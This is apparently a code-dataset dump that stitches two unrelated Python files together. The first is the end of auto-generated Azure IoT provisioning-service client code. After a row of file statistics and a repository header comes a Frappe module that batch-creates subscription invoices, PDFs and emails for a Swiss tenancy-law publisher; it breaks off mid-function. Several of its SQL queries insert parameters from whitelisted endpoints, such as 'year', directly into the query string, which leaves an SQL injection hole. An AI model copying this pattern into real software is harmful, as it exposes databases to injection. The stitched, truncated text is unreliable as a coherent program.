'operationId': self._serialize.url("operation_id", operation_id, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['asyncinfo'] = self._serialize.query("asyncinfo", asyncinfo, 'str')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AsyncOperationResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_valid_skus(
self, provisioning_service_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Get the list of valid SKUs for a provisioning service.
Gets the list of valid SKUs and tiers for a provisioning service.
:param provisioning_service_name: Name of provisioning service.
:type provisioning_service_name: str
:param resource_group_name: Name of resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of IotDpsSkuDefinition
:rtype:
~azure.mgmt.iothubprovisioningservices.models.IotDpsSkuDefinitionPaged[~azure.mgmt.iothubprovisioningservices.models.IotDpsSkuDefinition]
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/skus'
path_format_arguments = {
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.IotDpsSkuDefinitionPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.IotDpsSkuDefinitionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def check_provisioning_service_name_availability(
self, name, custom_headers=None, raw=False, **operation_config):
"""Check if a provisioning service name is available.
Check if a provisioning service name is available. This will validate
if the name is syntactically valid and if the name is usable.
:param name: The name of the Provisioning Service to check.
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NameAvailabilityInfo or ClientRawResponse if raw=true
:rtype:
~azure.mgmt.iothubprovisioningservices.models.NameAvailabilityInfo or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
arguments = models.OperationInputs(name=name)
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Devices/checkProvisioningServiceNameAvailability'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(arguments, 'OperationInputs')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NameAvailabilityInfo', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_keys(
self, provisioning_service_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Get the security metadata for a provisioning service.
List the primary and secondary keys for a provisioning service.
:param provisioning_service_name: The provisioning service name to get
the shared access keys for.
:type provisioning_service_name: str
:param resource_group_name: resource group name
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of
SharedAccessSignatureAuthorizationRuleAccessRightsDescription
:rtype:
~azure.mgmt.iothubprovisioningservices.models.SharedAccessSignatureAuthorizationRuleAccessRightsDescriptionPaged[~azure.mgmt.iothubprovisioningservices.models.SharedAccessSignatureAuthorizationRuleAccessRightsDescription]
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/listkeys'
path_format_arguments = {
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.SharedAccessSignatureAuthorizationRuleAccessRightsDescriptionPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.SharedAccessSignatureAuthorizationRuleAccessRightsDescriptionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list_keys_for_key_name(
self, provisioning_service_name, key_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Get a shared access policy by name from a provisioning service.
List primary and secondary keys for a specific key name.
:param provisioning_service_name: Name of the provisioning service.
:type provisioning_service_name: str
:param key_name: Logical key name to get key-values for.
:type key_name: str
:param resource_group_name: The name of the resource group that
contains the provisioning service.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SharedAccessSignatureAuthorizationRuleAccessRightsDescription
or ClientRawResponse if raw=true
:rtype:
~azure.mgmt.iothubprovisioningservices.models.SharedAccessSignatureAuthorizationRuleAccessRightsDescription
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/keys/{keyName}/listkeys'
path_format_arguments = {
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str'),
'keyName': self._serialize.url("key_name", key_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SharedAccessSignatureAuthorizationRuleAccessRightsDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
| 47.474758 | 230 | 0.681803 | 4,460 | 44,199 | 6.532287 | 0.058296 | 0.052825 | 0.032677 | 0.027185 | 0.885048 | 0.869465 | 0.859134 | 0.843139 | 0.831674 | 0.821652 | 0 | 0.003728 | 0.235345 | 44,199 | 930 | 231 | 47.525806 | 0.858301 | 0.27245 | 0 | 0.837838 | 0 | 0.004158 | 0.162562 | 0.105383 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058212 | false | 0 | 0.012474 | 0.006237 | 0.162162 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
94f3dbc68aa85e45900f07dd9f6df939e495316e | 41,443 | py | Python | mietrechtspraxis/mietrechtspraxis/page/invoice_and_print/invoice_and_print.py | libracore/mietrechtspraxis | 7b2320a70b98b086be136a86b1ab4fadfce215ff | [
"MIT"
] | 1 | 2021-07-15T13:25:23.000Z | 2021-07-15T13:25:23.000Z | mietrechtspraxis/mietrechtspraxis/page/invoice_and_print/invoice_and_print.py | libracore/mietrechtspraxis | 7b2320a70b98b086be136a86b1ab4fadfce215ff | [
"MIT"
] | 1 | 2022-01-27T13:30:56.000Z | 2022-01-27T13:30:56.000Z | mietrechtspraxis/mietrechtspraxis/page/invoice_and_print/invoice_and_print.py | libracore/mietrechtspraxis | 7b2320a70b98b086be136a86b1ab4fadfce215ff | [
"MIT"
] | 2 | 2021-08-14T22:23:08.000Z | 2021-09-08T09:31:51.000Z | # -*- coding: utf-8 -*-
# Copyright (c) 2021, libracore AG and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, os
from frappe.utils.data import today, now
from frappe import publish_progress
from frappe import _
from PyPDF2 import PdfFileWriter
from frappe.utils.background_jobs import enqueue
import math
from mietrechtspraxis.mietrechtspraxis.utils.qrr_reference import get_qrr_reference
@frappe.whitelist()
def get_show_data(sel_type):
anz_abos = frappe.db.sql("""SELECT COUNT(`name`) AS `qty` FROM `tabmp Abo` WHERE `status` = 'Active' OR `status` = 'Actively terminated'""", as_dict=True)[0].qty
anz_jahres_abos = frappe.db.sql("""SELECT COUNT(`name`) AS `qty` FROM `tabmp Abo` WHERE `type` = 'Jahres-Abo' AND `status` = 'Active'""", as_dict=True)[0].qty
anz_jahres_abos_gekuendet = frappe.db.sql("""SELECT COUNT(`name`) AS `qty` FROM `tabmp Abo` WHERE `type` = 'Jahres-Abo' AND `status` = 'Actively terminated'""", as_dict=True)[0].qty
anz_aktive_probe_abos = frappe.db.sql("""SELECT COUNT(`name`) AS `qty` FROM `tabmp Abo` WHERE `type` = 'Probe-Abo' AND `end_date` >= '{today}'""".format(today=today()), as_dict=True)[0].qty
anz_gratis_abos = frappe.db.sql("""SELECT COUNT(`name`) AS `qty` FROM `tabmp Abo` WHERE `type` = 'Gratis-Abo' AND `status` = 'Active'""", as_dict=True)[0].qty
return {
'anz_abos': anz_abos,
'anz_jahres_abos': anz_jahres_abos,
'anz_jahres_abos_gekuendet': anz_jahres_abos_gekuendet,
'anz_aktive_probe_abos': anz_aktive_probe_abos,
'anz_gratis_abos': anz_gratis_abos
}
@frappe.whitelist()
def create_invoices(date, year, selected_type, limit=False):
args = {
'date': date,
'year': year,
'selected_type': selected_type
}
enqueue("mietrechtspraxis.mietrechtspraxis.page.invoice_and_print.invoice_and_print._create_invoices", queue='long', job_name='Generierung Sammel-PDF (Rechnungslauf)', timeout=5000, **args)
def _create_invoices(date, year, selected_type, limit=500):
# berechne batch anzahl auf basis von Limit
filter_keine_doppel_rechnung = """SELECT `parent` FROM `tabmp Abo Invoice` WHERE `year` = '{year}'""".format(year=year)
if selected_type == 'invoice_inkl':
filter_invoice_typ = """`magazines_qty_ir` > 0"""
else:
filter_invoice_typ = """`magazines_qty_ir` = 0"""
filter_ausland_adressen = """ AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')"""
filter_inland_adressen = """ AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')"""
ausland_abos_qty = frappe.db.sql("""SELECT
COUNT(`name`) AS `qty`
FROM `tabmp Abo`
WHERE `type` = 'Jahres-Abo'
AND `status` = 'Active'
AND {filter_invoice_typ}
AND `name` NOT IN ({filter_keine_doppel_rechnung})
{filter_ausland_adressen} ORDER BY `magazines_qty_ir` ASC""".format(filter_invoice_typ=filter_invoice_typ,
filter_keine_doppel_rechnung=filter_keine_doppel_rechnung,
filter_ausland_adressen=filter_ausland_adressen), as_dict=True)[0].qty
inland_abos_qty = frappe.db.sql("""SELECT
COUNT(`name`) AS `qty`
FROM `tabmp Abo`
WHERE `type` = 'Jahres-Abo'
AND `status` = 'Active'
AND {filter_invoice_typ}
AND `name` NOT IN ({filter_keine_doppel_rechnung})
{filter_inland_adressen} ORDER BY `magazines_qty_ir` ASC""".format(filter_invoice_typ=filter_invoice_typ,
filter_keine_doppel_rechnung=filter_keine_doppel_rechnung,
filter_inland_adressen=filter_inland_adressen), as_dict=True)[0].qty
total_qty = ausland_abos_qty + inland_abos_qty
batch_anz = math.ceil((total_qty / limit))
# batch verarbeitung
for batch in range(batch_anz):
# reset doppel-rechnungs-filter
filter_keine_doppel_rechnung = """SELECT `parent` FROM `tabmp Abo Invoice` WHERE `year` = '{year}'""".format(year=year)
qty_one = 0
qty_multi = 0
abos = []
if limit:
limit_filter = ' LIMIT {limit}'.format(limit=limit)
else:
limit_filter = ''
ausland_abos = frappe.db.sql("""SELECT
`name`
FROM `tabmp Abo`
WHERE `type` = 'Jahres-Abo'
AND `status` = 'Active'
AND {filter_invoice_typ}
AND `name` NOT IN ({filter_keine_doppel_rechnung}){filter_ausland_adressen} ORDER BY `magazines_qty_ir` ASC{limit_filter}""".format(filter_invoice_typ=filter_invoice_typ, filter_keine_doppel_rechnung=filter_keine_doppel_rechnung, filter_ausland_adressen=filter_ausland_adressen, limit_filter=limit_filter), as_dict=True)
for ausland_abo in ausland_abos:
abos.append(ausland_abo)
inland_abos = frappe.db.sql("""SELECT
`name`
FROM `tabmp Abo`
WHERE `type` = 'Jahres-Abo'
AND `status` = 'Active'
AND {filter_invoice_typ}
AND `name` NOT IN ({filter_keine_doppel_rechnung}){filter_inland_adressen} ORDER BY `magazines_qty_ir` ASC{limit_filter}""".format(filter_invoice_typ=filter_invoice_typ, filter_keine_doppel_rechnung=filter_keine_doppel_rechnung, filter_inland_adressen=filter_inland_adressen, limit_filter=limit_filter), as_dict=True)
for inland_abo in inland_abos:
abos.append(inland_abo)
# create log file
rm_log = frappe.get_doc({
"doctype": "RM Log",
'start': now(),
'status': 'Job gestartet',
'typ': 'Rechnungen (1+ Ex.)' if selected_type == 'invoice_inkl' else 'Rechnungen (0 Ex.)'
})
rm_log.insert()
frappe.db.commit()
for _abo in abos:
abo = frappe.get_doc("mp Abo", _abo.name)
sinv = create_invoice(abo.name, date)
if sinv:
# update abo
row = abo.append('sales_invoices', {})
row.sales_invoice = sinv['sinv']
row.year = year
abo.save(ignore_permissions=True)
frappe.db.commit()
# update log file
sinv_row = rm_log.append('sinvs', {})
sinv_row.sinv = sinv['sinv']
if not sinv['send_as_mail']:
sinv_row.pdf = 1
else:
sinv_row.e_mail = 1
sinv_row.abo = abo.name
sinv_row.anz = abo.magazines_qty_ir
sinv_row.recipient_name = abo.recipient_name
rm_log.save(ignore_permissions=True)
frappe.db.commit()
if not sinv['send_as_mail']:
if selected_type == 'invoice_inkl':
if abo.magazines_qty_ir == 1:
qty_one += 1
else:
qty_multi += 1
# create sammel pdf
print_pdf(rm_log.name)
# update log file
rm_log.ende = now()
rm_log.status = 'PDF erstellt'
rm_log.qty_one = qty_one
rm_log.qty_multi = qty_multi
rm_log.save(ignore_permissions=True)
frappe.db.commit()
def create_invoice(abo, date):
from mietrechtspraxis.mietrechtspraxis.doctype.mp_abo.mp_abo import get_price
abo = frappe.get_doc("mp Abo", abo)
try:
new_sinv = frappe.get_doc({
"doctype": "Sales Invoice",
"set_posting_time": 1,
"posting_date": date,
"posting_time": "00:00:00",
"customer": abo.invoice_recipient,
"customer_address": abo.recipient_address,
"contact_person": abo.recipient_contact,
"items": [
{
"item_code": frappe.db.get_single_value('mp Abo Settings', 'jahres_abo'),
"qty": abo.qty_next_invoice,
"rate": get_price(frappe.db.get_single_value('mp Abo Settings', 'jahres_abo'), abo.invoice_recipient)
}
]
})
new_sinv.insert()
new_sinv.esr_reference = get_qrr_reference(sales_invoice=new_sinv.name, customer=abo.invoice_recipient)
new_sinv.save(ignore_permissions=True)
new_sinv.submit()
frappe.db.commit()
customer = frappe.get_doc("Customer", abo.invoice_recipient)
if customer.korrespondenz == 'E-Mail':
contact = frappe.get_doc("Contact", abo.recipient_contact)
if contact.email_id:
send_as_mail = True
mail = contact.email_id
if abo.magazines_qty_ir > 0:
printformat = 'Jahresrechnung inkl'
else:
printformat = 'Jahresrechnung exkl'
send_invoice_as_mail(new_sinv.name, mail, printformat)
new_sinv.sended_as_mail = 1
new_sinv.save()
frappe.db.commit()
else:
send_as_mail = False
mail = ''
else:
send_as_mail = False
mail = ''
return {
'sinv': new_sinv.name,
'send_as_mail': send_as_mail,
'mail': mail
}
except:
frappe.log_error(frappe.get_traceback(), 'create_invoice failed: {abo}'.format(abo=abo.name))
return False
def send_invoice_as_mail(sinv, address, printformat):
try:
frappe.sendmail([address],
subject= _("New Invoice: {sinv}").format(sinv=sinv),
reply_to= 'office@mietrecht.ch',
message = _("Please find attached Invoice {sinv}").format(sinv=sinv),
attachments = [frappe.attach_print('Sales Invoice', sinv, file_name=sinv, print_format=printformat)])
except:
frappe.log_error(frappe.get_traceback(), 'send_invoice_as_mail failed: {sinv}'.format(sinv=sinv))
def print_pdf(rm_log):
bind_source = "/assets/mietrechtspraxis/sinvs_for_print/{date}.pdf".format(date=rm_log)
physical_path = "/home/frappe/frappe-bench/sites" + bind_source
dest=str(physical_path)
invoices = frappe.db.sql("""SELECT `sinv`, `anz` FROM `tabRM Log Sinv` WHERE `parent` = '{rm_log}' AND `pdf` = 1 AND `e_mail` != 1 ORDER BY `idx` ASC""".format(rm_log=rm_log), as_list=True)
output = PdfFileWriter()
for invoice in invoices:
try:
if int(invoice[1]) > 0:
output = frappe.get_print("Sales Invoice", invoice[0], 'Jahresrechnung inkl', as_pdf = True, output = output, no_letterhead = 1, ignore_zugferd=True)
else:
output = frappe.get_print("Sales Invoice", invoice[0], 'Jahresrechnung exkl', as_pdf = True, output = output, no_letterhead = 1, ignore_zugferd=True)
except:
frappe.log_error(frappe.get_traceback(), 'print_pdf failed: {sinv}'.format(sinv=invoice[0]))
if isinstance(dest, str): # when dest is a file path
destdir = os.path.dirname(dest)
if destdir != '' and not os.path.isdir(destdir):
os.makedirs(destdir)
with open(dest, "wb") as w:
output.write(w)
else: # when dest is io.IOBase
output.write(dest)
return bind_source
@frappe.whitelist()
def create_begleitschreiben():
args = {}
enqueue("mietrechtspraxis.mietrechtspraxis.page.invoice_and_print.invoice_and_print.create_begleitschreiben_kuendigung", queue='long', job_name='Begleitschreiben: Kündigungen', timeout=5000, **args)
enqueue("mietrechtspraxis.mietrechtspraxis.page.invoice_and_print.invoice_and_print.create_begleitschreiben_gratis_abo", queue='long', job_name='Begleitschreiben: Gratis Abos', timeout=5000, **args)
enqueue("mietrechtspraxis.mietrechtspraxis.page.invoice_and_print.invoice_and_print.create_begleitschreiben_jahres_abo", queue='long', job_name='Begleitschreiben: Jahres-Abo Empfänger', timeout=5000, **args)
def create_begleitschreiben_kuendigung():
rm_log = frappe.get_doc({
"doctype": "RM Log",
'start': now(),
'status': 'Job gestartet',
'typ': 'Begleitschreiben: Kündigungen Ausland'
})
rm_log.insert()
frappe.db.commit()
ausland_datas = frappe.db.sql("""
SELECT
`view`.`abo` AS `abo`,
`view`.`anz` AS `anz`,
`view`.`recipient_name` AS `recipient_name`,
`view`.`recipient_contact` AS `recipient_contact`,
`view`.`recipient_address` AS `recipient_address`
FROM (
SELECT
`name` AS `abo`,
`magazines_qty_ir` AS `anz`,
`invoice_recipient` AS `recipient_name`,
`recipient_contact` AS `recipient_contact`,
`recipient_address` AS `recipient_address`
FROM `tabmp Abo`
WHERE `status` = 'Actively terminated'
AND `type` = 'Jahres-Abo'
AND `magazines_qty_ir` > 0
AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
UNION
SELECT
`parent` AS `abo`,
`magazines_qty_mr` AS `anz`,
`magazines_recipient` AS `recipient_name`,
`recipient_contact` AS `recipient_contact`,
`recipient_address` AS `recipient_address`
FROM `tabmp Abo Recipient`
WHERE `parent` IN (
SELECT
`name`
FROM `tabmp Abo`
WHERE `status` = 'Actively terminated'
AND `type` = 'Jahres-Abo'
)
AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
UNION
SELECT
`parent` AS `abo`,
`magazines_qty_mr` AS `anz`,
`magazines_recipient` AS `recipient_name`,
`recipient_contact` AS `recipient_contact`,
`recipient_address` AS `recipient_address`
FROM `tabmp Abo Recipient`
WHERE `parent` IN (
SELECT
`name`
FROM `tabmp Abo`
WHERE `status` = 'Active'
AND `type` = 'Jahres-Abo'
)
AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
AND `remove_recipient` IS NOT NULL
) AS `view`
ORDER BY `view`.`anz` ASC
""", as_dict=True)
for ausland_data in ausland_datas:
begleit_row = rm_log.append('begleitungen', {})
customer_name = frappe.get_doc("Customer", ausland_data.recipient_name).customer_name
begleit_row.recipient_name = customer_name
begleit_row.recipient_customer = ausland_data.recipient_name
# tbd!
begleit_row.pdf = 1
#---------------------
begleit_row.drucken = 1
begleit_row.abo = ausland_data.abo
begleit_row.anz = ausland_data.anz
begleit_row.recipient_contact = ausland_data.recipient_contact
begleit_row.recipient_address = ausland_data.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
rm_log.ende = now()
rm_log.status = 'PDF erstellt'
rm_log.save(ignore_permissions=True)
frappe.db.commit()
rm_log = frappe.get_doc({
"doctype": "RM Log",
'start': now(),
'status': 'Job gestartet',
'typ': 'Begleitschreiben: Kündigungen Inland'
})
rm_log.insert()
frappe.db.commit()
inland_datas = frappe.db.sql("""
SELECT
`view`.`abo` AS `abo`,
`view`.`anz` AS `anz`,
`view`.`recipient_name` AS `recipient_name`,
`view`.`recipient_contact` AS `recipient_contact`,
`view`.`recipient_address` AS `recipient_address`
FROM (
SELECT
`name` AS `abo`,
`magazines_qty_ir` AS `anz`,
`invoice_recipient` AS `recipient_name`,
`recipient_contact` AS `recipient_contact`,
`recipient_address` AS `recipient_address`
FROM `tabmp Abo`
WHERE `status` = 'Actively terminated'
AND `type` = 'Jahres-Abo'
AND `magazines_qty_ir` > 0
AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
UNION
SELECT
`parent` AS `abo`,
`magazines_qty_mr` AS `anz`,
`magazines_recipient` AS `recipient_name`,
`recipient_contact` AS `recipient_contact`,
`recipient_address` AS `recipient_address`
FROM `tabmp Abo Recipient`
WHERE `parent` IN (
SELECT
`name`
FROM `tabmp Abo`
WHERE `status` = 'Actively terminated'
AND `type` = 'Jahres-Abo'
)
AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
UNION
SELECT
`parent` AS `abo`,
`magazines_qty_mr` AS `anz`,
`magazines_recipient` AS `recipient_name`,
`recipient_contact` AS `recipient_contact`,
`recipient_address` AS `recipient_address`
FROM `tabmp Abo Recipient`
WHERE `parent` IN (
SELECT
`name`
FROM `tabmp Abo`
WHERE `status` = 'Active'
AND `type` = 'Jahres-Abo'
)
AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
AND `remove_recipient` IS NOT NULL
) AS `view`
ORDER BY `view`.`anz` ASC
""", as_dict=True)
for inland_data in inland_datas:
begleit_row = rm_log.append('begleitungen', {})
customer_name = frappe.get_doc("Customer", inland_data.recipient_name).customer_name
begleit_row.recipient_name = customer_name
begleit_row.recipient_customer = inland_data.recipient_name
# tbd!
begleit_row.pdf = 1
#---------------------
begleit_row.drucken = 1
begleit_row.abo = inland_data.abo
begleit_row.anz = inland_data.anz
begleit_row.recipient_contact = inland_data.recipient_contact
begleit_row.recipient_address = inland_data.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
rm_log.ende = now()
rm_log.status = 'PDF erstellt'
rm_log.save(ignore_permissions=True)
frappe.db.commit()
def create_begleitschreiben_gratis_abo():
qty_one = 0
qty_multi = 0
rm_log = frappe.get_doc({
"doctype": "RM Log",
'start': now(),
'status': 'Job gestartet',
'typ': 'Begleitschreiben: Gratis Abos Ausland'
})
rm_log.insert()
frappe.db.commit()
ausland_datas = frappe.db.sql("""
SELECT
`view`.`abo` AS `abo`,
`view`.`anz` AS `anz`,
`view`.`recipient_name` AS `recipient_name`,
`view`.`recipient_contact` AS `recipient_contact`,
`view`.`recipient_address` AS `recipient_address`
FROM (
SELECT
`name` AS `abo`,
`magazines_qty_ir` AS `anz`,
`invoice_recipient` AS `recipient_name`,
`recipient_contact` AS `recipient_contact`,
`recipient_address` AS `recipient_address`
FROM `tabmp Abo`
WHERE `status` = 'Active'
AND `type` = 'Gratis-Abo'
AND `magazines_qty_ir` > 0
AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
) AS `view`
ORDER BY `view`.`anz` ASC
""", as_dict=True)
for ausland_data in ausland_datas:
if ausland_data.anz == 1:
qty_one += 1
else:
qty_multi += 1
begleit_row = rm_log.append('begleitungen', {})
customer_name = frappe.get_doc("Customer", ausland_data.recipient_name).customer_name
begleit_row.recipient_name = customer_name
begleit_row.recipient_customer = ausland_data.recipient_name
# tbd!
begleit_row.pdf = 1
#---------------------
begleit_row.drucken = 1
begleit_row.abo = ausland_data.abo
begleit_row.anz = ausland_data.anz
begleit_row.recipient_contact = ausland_data.recipient_contact
begleit_row.recipient_address = ausland_data.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
rm_log.ende = now()
rm_log.status = 'PDF erstellt'
rm_log.qty_one = qty_one
rm_log.qty_multi = qty_multi
rm_log.save(ignore_permissions=True)
frappe.db.commit()
qty_one = 0
qty_multi = 0
rm_log = frappe.get_doc({
"doctype": "RM Log",
'start': now(),
'status': 'Job gestartet',
'typ': 'Begleitschreiben: Gratis Abos Inland'
})
rm_log.insert()
frappe.db.commit()
inland_datas = frappe.db.sql("""
SELECT
`view`.`abo` AS `abo`,
`view`.`anz` AS `anz`,
`view`.`recipient_name` AS `recipient_name`,
`view`.`recipient_contact` AS `recipient_contact`,
`view`.`recipient_address` AS `recipient_address`
FROM (
SELECT
`name` AS `abo`,
`magazines_qty_ir` AS `anz`,
`invoice_recipient` AS `recipient_name`,
`recipient_contact` AS `recipient_contact`,
`recipient_address` AS `recipient_address`
FROM `tabmp Abo`
WHERE `status` = 'Active'
AND `type` = 'Gratis-Abo'
AND `magazines_qty_ir` > 0
AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
) AS `view`
ORDER BY `view`.`anz` ASC
""", as_dict=True)
for inland_data in inland_datas:
if inland_data.anz == 1:
qty_one += 1
else:
qty_multi += 1
begleit_row = rm_log.append('begleitungen', {})
customer_name = frappe.get_doc("Customer", inland_data.recipient_name).customer_name
begleit_row.recipient_name = customer_name
begleit_row.recipient_customer = inland_data.recipient_name
# tbd!
begleit_row.pdf = 1
#---------------------
begleit_row.drucken = 1
